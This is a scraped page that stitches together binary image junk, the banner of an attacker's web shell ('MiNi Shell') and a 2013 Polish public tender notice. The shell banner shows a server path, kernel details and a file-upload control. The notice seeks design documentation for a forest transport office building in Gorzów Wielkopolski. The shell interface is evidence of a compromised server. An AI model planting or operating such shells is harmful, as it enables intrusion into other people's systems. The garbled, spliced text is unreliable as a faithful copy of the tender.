JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130509/182990-N-2013.html

<p class="kh_header"><b>Gorzów Wielkopolski: OPRACOWANIE  DOKUMENTACJI PROJEKTOWEJ DLA ZADANIA INWESTYCYJNEGO POD NAZWĄ NOWY BUDYNEK BIUROWY OŚRODKA TRANSPORTU LEŚNEGO W GORZOWIE WLKP. PRZY ULICY SZPITALNEJ 2 W GORZOWIE WLKP.</b><br>
<b>Numer ogłoszenia: 182990 - 2013; data zamieszczenia: 09.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe Ośrodek Transportu Leśnego , ul. Szpitalna 2, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 95 7323788*100, faks 95 7323788*102.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.szczecin.lasy.gov.pl/web/otl_gorzow</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Jednostki Organizacyjne - własność.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE  DOKUMENTACJI PROJEKTOWEJ DLA ZADANIA INWESTYCYJNEGO POD NAZWĄ NOWY BUDYNEK BIUROWY OŚRODKA TRANSPORTU LEŚNEGO W GORZOWIE WLKP. PRZY ULICY SZPITALNEJ 2 W GORZOWIE WLKP..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowej wraz z kosztorysem inwestorskim na budowę nowego budynku biurowego Ośrodka Transportu Leśnego w Gorzowie Wlkp. przy ulicy Szpitalnej 2  o planowanej powierzchni użytkowej 633,20 m2. 
Przedmiot zamówienia obejmuje: 
Projekt budowlany w zakresie uwzględniającym specyfikę robót budowlanych objętych przedmiotem zamówienia, opracowany zgodnie z zatwierdzoną i przyjętą przez Zamawiającego koncepcją oraz z rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25.04.2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012 r., poz. 462). -7 egz. w wersji papierowej wraz z wersją elektroniczną na płycie CD w ogólnodostępnym formacie pdf  
-geotechniczne warunki posadowienia,
-inwentaryzacja wraz z opinią techniczną w niezbędnym zakresie do opracowania projektu,
-projekt rozbiórki istniejących obiektów: pawilonu Namysłów, 
-branża konstrukcyjna,
-branża architektoniczna, zagospodarowanie terenu, drogi, parkingi, mała architektura,
-branża elektryczna, telekomunikacyjna (sieć internetowa, sieć komputerowa, sieć telefoniczna,  instalacja sygnalizacji ppoż.(Rzut każdej kondygnacji zawierający instalacje ppoż musi być zatwierdzony przez rzeczoznawcę ppoż i potwierdzony jego podpisem wraz z pieczątką) , instalacja dźwiękowego systemu ostrzegawczego, instalacja sygnalizacji włamania, instalacja wewnętrzna i zewnętrzna monitoringu wraz z systemem kamer, instalacja odgromowa)
-branża sanitarna ( instalacja wod-kan, c.o., kanalizacja deszczowa)
-projekt klimatyzacji i wentylacji,
-projekt aranżacji wnętrz z umeblowaniem,
-projekt ogrodzenia,
-raport o oddziaływaniu na środowisko projektowanej inwestycji (w przypadku gdy jest wymagany),
-charakterystyka energetyczna obiektu budowlanego. 
2.Informację dotyczącą bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanego obiektu budowlanego (do planu bezpieczeństwa) opracowaną zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003r. Nr 120 poz. 1126) - 3 egz. w wersji papierowej wraz z wersją elektroniczną na płycie CD w formacie plików pdf,
3.Projekt wykonawczy do opracowanego projektu budowlanego, w zakresie, o którym mowa w § 5 Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. Nr 202, poz. 2072 z późn. zm.)-7 egz. w wersji papierowej wraz z wersją elektroniczną na płycie CD w ogólnodostępnym formacie plików - pdf, 
Zawartość projektu wykonawczego:
-branża konstrukcyjna,
-projekt rozbiórki istniejącego obiektu: pawilonu Namysłów,
-branża architektoniczna, zagospodarowanie terenu, drogi, parkingi, mała
architektura,
-branża elektryczna, telekomunikacyjna (sieć internetowa, sieć komputerowa, sieć telefoniczna, instalacja sygnalizacji ppoż.(Rzut każdej kondygnacji 	zawierający instalacje ppoż musi być zatwierdzony przez rzeczoznawcę ppoż i potwierdzony jego podpisem wraz z pieczątką), instalacja dźwiękowego systemu ostrzegawczego, instalacja sygnalizacja włamania, instalacja wewnętrzna i zewnętrzna monitoringu wraz z systemem kamer, instalacja odgromowa)
-branża sanitarna ( instalacja wod-kan, c.o., kanalizacja deszczowa)
-projekt klimatyzacji i wentylacji,
-projekt aranżacji wnętrz z umeblowaniem,
-projekt ogrodzenia,
4.Opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych objętych przedmiotem zamówienia, zgodnie z rozdziałem 3 Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2004 r. Nr 202, poz. 2072 z późn. zm.)-7 egz. w wersji papierowej wraz z wersją	elektroniczną na płycie CD w formacie plików pdf,
5.Kosztorys inwestorski we wszystkich branżach, sporządzony zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. Nr 130, poz. 1389)-3 egz. do każdej branży w wersji papierowej wraz z wersją elektroniczną na płycie CD,
6.Przedmiary robót we wszystkich branżach, w zakresie o którym mowa w § 6 Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2004 r. Nr 202, poz. 2072 z późn. zm.) - 3 egz. do każdej branży w wersji papierowej wraz z wersją elektroniczną na płycie CD ,
7. Zbiorcze zestawienie kosztów - 3 egz. wersja papierowa i elektroniczna w arkuszu kalkulacyjnym Excel. 
W wersji elektronicznej projektu należy zachować kolejność stron zgodnie z
projektem budowlanym i wykonawczym.
8.Przedmiot zamówienia obejmuje ponadto:
a)uzyskanie warunków technicznych (m.in. od dostawców mediów, wycinka drzew itp.) oraz dokonanie uzgodnień niezbędnych do prawidłowego opracowania dokumentacji projektowej oraz realizacji zadania inwestycyjnego ;
b)uzyskanie decyzji pozwolenia na budowę;
c)uzyskanie decyzji środowiskowej (w przypadku gdy jest wymagana);
d)uzyskanie podkładów geodezyjnych, niezbędnych uzgodnień i pozwoleń oraz poniesienie związanych z tym kosztów;
e)dokonywanie uzupełnień lub wyjaśnień szczegółowych dotyczących opracowanej dokumentacji, na każde żądanie Zamawiającego do czasu wyłonienia wykonawcy robót bez dodatkowych roszczeń finansowych;
f)sporządzenie świadectwa charakterystyki energetycznej obiektu przed oddaniem budynku do użytkowania, co może być zlecone odrębnie w umowie o nadzór autorski.
Uwaga: Wykonawca wykonujący dokumentację projektową muszą przestrzegać zapisów zawartych w art. 29 ust. 3 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.), które określają, że przedmiotu zamówienia nie można opisywać przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia i zamawiający nie może opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń.
9.Wymagany okres gwarancji na dokumentację projektową obejmuje czas realizacji projektu wraz z wykonaniem robót budowlanych oraz uzyskaniem pozwolenia na użytkowanie: 24 miesiące od odbioru przez Zamawiają przedmiotu zamówienia wraz z pozwoleniem na budowę.
Zamawiający przekaże Wykonawcy na etapie zaproszenia do złożenia oferty: opracowaną i przyjętą przez Zamawiającego koncepcję architektoniczną  oraz szacunkową wycenę zadania inwestycyjnego z podziałem na poszczególne rodzaje
robót budowlanych, kopię mapy do celów projektowych w skali 1: 500..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0, 71.22.10.00-6, 71.22.30.00-7, 71.24.20.00-6, 71.24.50.00-7, 71.32.10.00-4, 71.32.12.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 210.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający ustala wysokość wadium na kwotę  3 000,00 zł (słownie: trzy tysiące złotych). Do wniesienia wadium zobowiązani będą Wykonawcy zaproszeni do składania ofert. 
2.Wadium może być wnoszone wedle wyboru Wykonawcy w jednej lub kilku następujących formach:
1)w pieniądzu; przelewem na konto Zamawiającego w banku BGŻ 03 2030 0045 1110 0000 0226 9560 - Wadium - nr sprawy: 2711/1/2013. Za moment wniesienia wadium uznaje się moment uznania rachunku Zamawiającego. Zamawiający uzna wadium za skutecznie wniesione, jeżeli  wymagana kwota wadium znajdzie się na koncie Zamawiającego w terminie składania ofert. 
2)w poręczeniach bankowych - dowodem wniesienia wadium będzie oryginał dokumentu załączony do oferty, 
3)w gwarancjach bankowych - dowodem wniesienia wadium będzie oryginał dokumentu załączony do oferty w oddzielnej kopercie,
4)w gwarancjach ubezpieczeniowych - dowodem wniesienia wadium będzie oryginał dokumentu załączony do oferty
5)poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275, z 2008r. Nr 116, poz. 730 i 732, poz. 1505 oraz z 2010r. Nr 96, poz. 620).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww. warunek, gdy Wykonawca oświadczy, że spełnia dany warunek.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww. warunek, gdy Wykonawca wykaże, że wykonał w okresie ostatnich pięciu latach przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej pięć usług polegających na wykonaniu dokumentacji projektowej dotyczącej budowy (w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane tj. Dz. U. z 2010 r. nr 243 poz. 1623) budynku użyteczności publicznej wraz z pozwoleniem na budowę  o powierzchni użytkowej nie mniej niż 600,00 m2  każda. Przez budynek użyteczności publicznej Zamawiający rozumie zgodnie z §3 pkt 6 rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki  i ich usytuowanie (Dz. U. 2002 r. Nr 75, poz. 680 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww. warunek, gdy Wykonawca oświadczy, że spełnia dany warunek.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponuję co najmniej: 
a)1 osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności architektonicznej zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. Nr 83, poz. 578 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, które uprawniają bez ograniczeń do projektowania w zakresie specjalności architektonicznej oraz zagraniczne uprawnienia uznane w zakresie i na zasadach opisanych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 63 poz. 394).
b)1 osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności konstrukcyjno-budowlanej zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2006 r. Nr 83, poz. 578 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, które uprawniają bez ograniczeń do projektowania w zakresie specjalności konstrukcyjno-budowlanej oraz zagraniczne uprawnienia uznane w zakresie i na zasadach opisanych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 63 poz. 394).
c)1 osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych,wentylacyjnych, wodociągowych i kanalizacyjnych zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2006 r. Nr 83, poz. 578 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, które uprawniają bez ograniczeń do projektowania w zakresie specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych,wentylacyjnych, wodociągowych i kanalizacyjnych oraz zagraniczne uprawnienia uznane w zakresie i na zasadach opisanych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 63 poz. 394).
d)1 osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2006 r. Nr 83, poz. 578 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, które uprawniają bez ograniczeń do projektowania w zakresie specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz zagraniczne uprawnienia uznane w zakresie i na zasadach opisanych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 63 poz. 394).
e)1 osobą posiadająca uprawnienia budowlane do projektowania bez ograniczeń w specjalności telekomunikacyjnej zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2006 r. Nr 83, poz. 578 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, które uprawniają bez ograniczeń do projektowania w zakresie specjalności telekomunikacyjnej oraz zagraniczne uprawnienia uznane w zakresie i na zasadach opisanych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 63 poz. 394).
Warunki zostaną spełnione, jeżeli wykonawcy wskażę tą samą osobę jako posiadającą uprawnienia budowlane w więcej niż jednej specjalności wymaganej przez Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia ww. warunek gdy Wykonawca oświadczy, że spełnia dany warunek</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>Dowodami, o których mowa w zdaniu poprzednim są:
1)poświadczenie,
2)oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w ppkt 1.
W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi  wskazane w wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów.
Wykonawca, w miejsce poświadczeń, o których mowa w ppkt 1, może przedłożyć dokumenty potwierdzające należyte wykonanie usług, określone w § 1 ust. 1 pkt 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3.1) ogłoszenia, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejscu zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem; wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia.
2.Ponadto, Wykonawca zobowiązany jest do złożenia wniosku o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia stanowiącego załącznik nr 1 do ogłoszenia.
3. Załącznikami do ogłoszenia są: 
1)Wniosek o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia stanowiący załącznik nr 1 do ogłoszenia,
2)Oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych, stanowiące załącznik nr 2 do ogłoszenia,
3)Oświadczenie o braku podstaw do wykluczenia z powodu okoliczności, o których mowa w art. 24 ust. 1 ustawy Prawo zamówień publicznych, stanowiące załącznik nr 3 do ogłoszenia, 
